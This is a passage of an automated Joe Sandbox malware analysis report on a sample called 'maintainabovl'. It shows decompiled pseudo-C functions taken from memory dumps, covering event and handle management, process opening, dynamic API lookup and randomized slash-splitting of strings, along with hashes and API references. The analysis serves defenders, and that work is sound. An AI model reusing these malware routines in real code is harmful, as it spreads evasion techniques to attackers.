Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

WaitForSingleObject.KERNEL32(00000000,00004E20,010929BE,00000000,00000000,?,00000000,?,010929BE,?,?,?), ref: 0109472A
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 01094758
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,010929BE,?,?,?), ref: 01094770

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 3faff5a64b556390f7fa44cf71e3eeec31d1f36bbf9be2f7c9c7ca893fb5b1fb
Instruction ID: f7bfb8f4efa6386895077b8b4b1223fb12b91e2d65fe86b1c86250d9b47cfbed
Opcode Fuzzy Hash: 3faff5a64b556390f7fa44cf71e3eeec31d1f36bbf9be2f7c9c7ca893fb5b1fb
Instruction Fuzzy Hash: B1215C326007159BDF319E6C9DB4AAFB7E9FF8A710B050259FAD1DB104D765C802A740

Uniqueness

Uniqueness Score: -1.00%

Function 0109290F Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0109290F(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E01092D11(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E01091EE8(_t23);
						}
					}
					return _t38;
				}
				if(E0109181A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x109a34c, 1, 0,  *0x109a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E01096940(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0109202C(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E0109739F(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E01094689( &_v32, _t39);
					goto L13;
				}
			}

0x0109290f
0x0109291c
0x01092922
0x01092923
0x01092924
0x01092925
0x01092926
0x0109292a
0x01092936
0x0109293a
0x010929c2
0x010929c2
0x010929c5
0x010929c7
0x010929cf
0x010929d5
0x010929d8
0x010929d8
0x010929d5
0x010929e3
0x010929e3
0x0109294d
0x0109294f
0x0109294f
0x01092966
0x0109296a
0x0109296d
0x01092978
0x0109297f
0x0109297f
0x01092988
0x0109298c
0x0109299a
0x0109298e
0x0109298e
0x0109298f
0x01092990
0x01092991
0x01092992
0x01092993
0x01092993
0x0109299f
0x010929a2
0x010929a6
0x010929a8
0x010929a8
0x010929af
0x00000000
0x010929b1
0x010929b1
0x010929be
0x00000000
0x010929be

APIs

CreateEventA.KERNEL32(0109A34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 01092960
SetEvent.KERNEL32(00000000), ref: 0109296D
Sleep.KERNEL32(00000BB8), ref: 01092978
CloseHandle.KERNEL32(00000000), ref: 0109297F

Part of subcall function 01096940: WaitForSingleObject.KERNEL32(00000000,?,?,?,0109299F,?,0109299F,?,?,?,?,?,0109299F,?), ref: 01096A1A

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: ba75829ba36d2d47ae39f973cc59a981e1acccc8372e64892ede2c2d83155a1f
Instruction ID: 7d127cc94e5021eb633533b4f5a7286fc15da5481625112fd8ad5ad7c5705881
Opcode Fuzzy Hash: ba75829ba36d2d47ae39f973cc59a981e1acccc8372e64892ede2c2d83155a1f
Instruction Fuzzy Hash: 9121AA73D0011ABFDF20BFE888A59DE77ECAB48350B014469FBE5A7100D7359945D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01095C78 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01095C78(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E01096A51(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x01095c84
0x01095c88
0x01095c89
0x01095c8a
0x01095c8c
0x01095c8e
0x01095c91
0x01095c96
0x01095d2d
0x01095d34
0x01095d34
0x01095c9f
0x01095ca6
0x01095cb6
0x01095cb6
0x01095cbc
0x01095cbe
0x01095cc3
0x01095ccc
0x01095cd2
0x01095cd7
0x01095ce2
0x01095ce6
0x01095ce8
0x01095ce9
0x01095cf2
0x01095cf6
0x01095d07
0x01095cf8
0x01095cfd
0x01095d02
0x01095d11
0x01095d11
0x01095ce6
0x01095d17
0x01095d1d
0x01095d1d
0x01095d26
0x01095d2b
0x01095d2b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 01095CA6
lstrlenW.KERNEL32(?), ref: 01095CDC
memcpy.NTDLL(00000000,?,?,?), ref: 01095CFD
SysFreeString.OLEAUT32(?), ref: 01095D11

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 4be9f642a36793e3c584b97db0e9d6712f0666e17e7a81a94ca26d5e93408b5a
Instruction ID: 57c779990988da8b1569ce3c59da92016f40158344f0892c6712f2d491669ef2
Opcode Fuzzy Hash: 4be9f642a36793e3c584b97db0e9d6712f0666e17e7a81a94ca26d5e93408b5a
Instruction Fuzzy Hash: 2F21327590120AEFDF11EFA9D8989DEBBF4FF48204F1041AAE99597210E735DA01DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0109229C Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0109229C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x109a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x109a2f0; // 0x8b6644f2
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x109a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x010922a4
0x010922a7
0x010922ad
0x010922c5
0x010922c7
0x010922cc
0x010922ce
0x010922d1
0x010922d3
0x010922d6
0x010922d8
0x010922d8
0x010922da
0x010922e5
0x010922ea
0x010922fb
0x01092303
0x01092308
0x0109230b
0x0109230e
0x01092310
0x01092313
0x01092316
0x01092316
0x01092319
0x01092324
0x01092329
0x01092333

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010958B0,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 010922A7
RtlAllocateHeap.NTDLL(00000000,?), ref: 010922BF
memcpy.NTDLL(00000000,01B09600,-00000008,?,?,?,010958B0,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01092303
memcpy.NTDLL(00000001,01B09600,00000001,0109384E,00000000,01B09600), ref: 01092324

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: dbf9ccf7f0594eac14041a7befef34f2b6ed826ba88e7e0a3409c2e4a0d057f9
Instruction ID: f383ce95580bcae5f9f15f486703c23968053d80c3f6a28f327d52f7f3f69c7e
Opcode Fuzzy Hash: dbf9ccf7f0594eac14041a7befef34f2b6ed826ba88e7e0a3409c2e4a0d057f9
Instruction Fuzzy Hash: 35110672A00215BFDB208B6DDC94D9E7BFEEBD4260B0502B6F54497180E7769E0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 01095F7C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01095F7C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E01094BC4(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x109a348; // 0xa6d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x109b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x109b904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E01091897();
					_push( &_v64);
					if( *0x109a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E01091897();
				}
				return _t28;
			}

0x01095f7c
0x01095f83
0x01095f91
0x01095f95
0x01095f9f
0x01095fa4
0x01095fa9
0x01095fae
0x01095fb8
0x01095fc2
0x01095fc2
0x01095fba
0x01095fba
0x01095fba
0x01095fba
0x01095fc8
0x01095fce
0x01095fcf
0x01095fd2
0x01095fd5
0x01095fd8
0x01095fe0
0x01095fe9
0x01095ff1
0x01095ff1
0x01095ff3
0x01095ff5
0x01095ff5
0x01095fff

APIs

Part of subcall function 01094BC4: SysAllocString.OLEAUT32(00000000), ref: 01094C1E
Part of subcall function 01094BC4: SysAllocString.OLEAUT32(0070006F), ref: 01094C32
Part of subcall function 01094BC4: SysAllocString.OLEAUT32(00000000), ref: 01094C44

memset.NTDLL ref: 01095F9F
GetLastError.KERNEL32 ref: 01095FEB

Strings

<, xrefs: 01095FAE
@MqtNqt, xrefs: 01095FEB

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MqtNqt
API String ID: 3736384471-349977332
Opcode ID: a79b9bee452bf5f0ec487bcea0a8931e701f5d770df34c2c4b1a25a3e693de4a
Instruction ID: bede6d2418858a86a80bcc240f87d5e5cf467a3f44f6c8a4b12ec116418fa6e5
Opcode Fuzzy Hash: a79b9bee452bf5f0ec487bcea0a8931e701f5d770df34c2c4b1a25a3e693de4a
Instruction Fuzzy Hash: 73014071A00219ABDF11EFA9D8A4EDEBBF8BB18750F004526F984E7240D77095049B90

Uniqueness

Uniqueness Score: -1.00%

Function 01094B73 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01094B73(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x01094b7d
0x01094b81
0x01094b96
0x01094b98
0x01094b9d
0x01094ba3
0x01094ba5
0x01094baa
0x01094bb5
0x01094bac
0x01094bac
0x01094bac
0x01094baa
0x01094bc3

APIs

memset.NTDLL ref: 01094B81
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 01094B96
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01094BA3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01094BB5

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 4fec1af9e7052bcd0bd4e3ec652f90515cf1d648b4c221bd11925ba8d2384e0d
Instruction ID: 7bb5d310168f33092ac77735d61cfb89cdd9db2be0a2962dc3c7c9423da91dc0
Opcode Fuzzy Hash: 4fec1af9e7052bcd0bd4e3ec652f90515cf1d648b4c221bd11925ba8d2384e0d
Instruction Fuzzy Hash: 47F05EB11043087FEB206F26DCD4C2BBBECFB8119CB11896EF6C282511D676A8099B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401D96 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D96() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x403170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40317c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40316c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x403168 = _t5;
						 *0x403170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x403164 = _t6;
						if(_t6 == 0) {
							 *0x403164 =  *0x403164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401d97
0x00401da5
0x00401dab
0x00401db2
0x00401e09
0x00401e09
0x00401db4
0x00401dbc
0x00401dc9
0x00401dc9
0x00401e05
0x00401e07
0x00000000
0x00000000
0x00000000
0x00401dbe
0x00401dc5
0x00401dcb
0x00401dcb
0x00401dd0
0x00401dde
0x00401de3
0x00401de9
0x00401def
0x00401df6
0x00401df8
0x00401df8
0x00401e02
0x00401dc7
0x00401dc7
0x00000000
0x00401dc7
0x00401dc5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401183), ref: 00401DA5
GetVersion.KERNEL32 ref: 00401DB4
GetCurrentProcessId.KERNEL32 ref: 00401DD0
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DE9

Memory Dump Source

Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
Instruction ID: 07fb61b28b68616bd8ab1bea8bce7da9b136578869b72dd0dbabbca40450c2b3
Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
Instruction Fuzzy Hash: F4F019319803019BE7215F78BE1DB5A3FA9A709712F140536E641FA2F0D7B49A41CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 010971C2 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010971C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x109a30c; // 0x16c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x109a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x109a30c; // 0x16c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x109a2d8; // 0x1710000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x010971c2
0x010971c9
0x01097213
0x01097215
0x01097215
0x010971cd
0x010971d3
0x010971d8
0x010971dc
0x010971e2
0x010971e9
0x00000000
0x00000000
0x010971eb
0x010971f0
0x00000000
0x00000000
0x00000000
0x010971f0
0x010971f2
0x010971fa
0x010971fd
0x010971fd
0x01097203
0x0109720a
0x0109720d
0x0109720d
0x00000000

APIs

SetEvent.KERNEL32(0000016C,00000001,0109190A), ref: 010971CD
SleepEx.KERNEL32(00000064,00000001), ref: 010971DC
CloseHandle.KERNEL32(0000016C), ref: 010971FD
HeapDestroy.KERNEL32(01710000), ref: 0109720D

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: bc13807a8bc1cb376294233d6dee01446b46243c595e01e271d9586e4076b5e0
Instruction ID: f7b97014727fed0c4ffff02cb9164892f59f1ecc83753123ed28cd1a29bfb6ae
Opcode Fuzzy Hash: bc13807a8bc1cb376294233d6dee01446b46243c595e01e271d9586e4076b5e0
Instruction Fuzzy Hash: B2F03772B10311DBEF305B3DE868B563BD9BB046657144594BD90D32C9DB6AC4409B60

Uniqueness

Uniqueness Score: -1.00%

Function 01096068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01096068(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x109a340;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x109a2f4; // 0x170
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x109a348; // 0xa6d5a8
				_t3 = _t12 + 0x109b0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x109a348; // 0xa6d5a8
				_t4 = _t17 + 0x109b9e0; // 0x6f577349
				 *0x109a314 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x109a340 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x0109606c
0x01096071
0x01096076
0x0109607e
0x010960b4
0x010960b6
0x010960bd
0x010960c1
0x010960c3
0x010960c3
0x010960c1
0x010960c6
0x010960cb
0x010960cb
0x01096080
0x01096085
0x0109608c
0x01096092
0x01096098
0x010960a0
0x010960a5
0x010960ab
0x010960b2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,010910AF,?,?), ref: 0109608C
GetProcAddress.KERNEL32(00000000,6F577349), ref: 010960A5

Strings

Nqt, xrefs: 010960A5

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Nqt
API String ID: 1646373207-806837294
Opcode ID: 54804585beb365b9d0c1c9ff4886575f07eaf87fab183f5e2f6ace15e7a63f1d
Instruction ID: 67bc298a96317af94a23508b9fcdc71dd8e9f0511a6439fd00cfcd1b9cb75be7
Opcode Fuzzy Hash: 54804585beb365b9d0c1c9ff4886575f07eaf87fab183f5e2f6ace15e7a63f1d
Instruction Fuzzy Hash: 18F04471A11206EFDF24CF59DA64EAA33FCBB486457004158F5C0D3104E77EEA04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 010955B2 Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E010955B2(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E01096A51(_t2);
				if(_t34 != 0) {
					_t30 = E01096A51(_t28);
					if(_t30 == 0) {
						E0109692B(_t34);
					} else {
						_t39 = _a4;
						_t22 = E01097A2A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E01097A2A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x010955b2
0x010955bc
0x010955be
0x010955c4
0x010955c4
0x010955cd
0x010955d1
0x010955dd
0x010955e1
0x01095655
0x010955e3
0x010955e3
0x010955e7
0x010955ec
0x010955f1
0x0109560b
0x010955fa
0x010955fa
0x010955fe
0x01095601
0x01095606
0x01095606
0x01095610
0x01095638
0x0109563e
0x01095641
0x01095612
0x01095614
0x0109561c
0x01095627
0x0109562c
0x0109562c
0x01095648
0x0109564f
0x01095650
0x01095650
0x010955e1
0x01095660

APIs

lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0), ref: 010955BE

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

Part of subcall function 01097A2A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010955EC,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102), ref: 01097A38
Part of subcall function 01097A2A: StrChrA.SHLWAPI(?,0000003F,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 01097A42

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102,01095BA4,?), ref: 0109561C
lstrcpy.KERNEL32(00000000,00000000), ref: 0109562C
lstrcpy.KERNEL32(00000000,00000000), ref: 01095638

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
